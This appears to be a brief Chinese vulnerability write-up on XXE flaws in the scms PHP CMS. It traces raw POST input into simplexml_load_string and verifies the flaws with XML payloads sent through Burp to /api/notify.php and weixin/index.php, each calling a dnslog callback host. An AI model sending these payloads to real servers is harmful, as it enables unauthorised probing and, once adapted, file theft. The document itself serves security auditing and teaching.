xxe-scms
- 代码审核
(1)全局搜索simplexml_load_string
simplexml_load_string--将XML字符串解释为对象
(2)查看源代码
ID=1
$GLOBALS['HTTP_RAW_POST_DATA']就相当于file_get_contents("php://input");
因此这里就存在xxe漏洞
ID=6
这里也出现了file_get_contents("php://input");
因此也存在xxe漏洞
2.验证xxe漏洞
(1)/api/notify.php
找到漏洞点位置
www.scms.com/api/notify.php
用burp抓包输入代码得到
将get改为post
输入
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://gao.xkgyim.dnslog.cn">
]>
<x>&xxe;</x>
打开dnslog
成功写入证明漏洞验证成功
(2)weixin/index.php
与上述同理先访问漏洞点
www.scms.com/weixin/index.php
再用burp抓包
将get改为post
输入
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[
<!ENTITY name SYSTEM "http://gao.uqli55.dnslog.cn">]>
<root>
<username>&name;</username>
</root>
![[Linux 杂货铺] —— 权限(文件权限和目录配置)](https://img-blog.csdnimg.cn/direct/74068a2d25f14ba6b9cf75c8bbcba5aa.gif)
